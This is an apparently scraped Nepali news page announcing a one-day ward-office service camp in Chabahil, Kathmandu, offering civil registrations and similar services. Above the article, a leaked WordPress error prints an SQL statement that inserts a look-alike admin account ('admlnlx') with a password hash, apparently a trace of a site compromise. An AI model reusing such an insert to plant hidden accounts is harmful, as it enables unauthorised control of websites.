WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Be2Pp.ExcLidkNwrb6mboOrZaRquBf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 07:29:00', '', 'admlnlx', 'admlnlx')
काठमाडौं । माप्यदुधकोशी गाउँपालिका वडा नम्बर ६ ले काठमाडौमा बसोबास गर्ने वडाबासिको लागि एकदिने घुम्ती शिबिर सञ्चालन गर्ने भएकोछ ।
काठमाडौंको हाक्कु रेष्टुरेन्ट गोपिकृष्ण सडक चाबाहिलमा मंगलबर (भोली) १०:०० बजे बाट ४:०० बजेसम्म सन्चालन हुने वडाअध्यक्ष रामप्रसाद मगरले बताए ।
उक्त शिबिरमा जन्मदर्ता, बिबाह दर्ता, मृत्यु दर्ता, नाता प्रमाणित, सामाजिक सुरक्षा भत्ता नवीकरण, मालपोत रसिद जस्ता सेवा प्रदान गरिने वडाअध्यक्ष मगरले बताए ।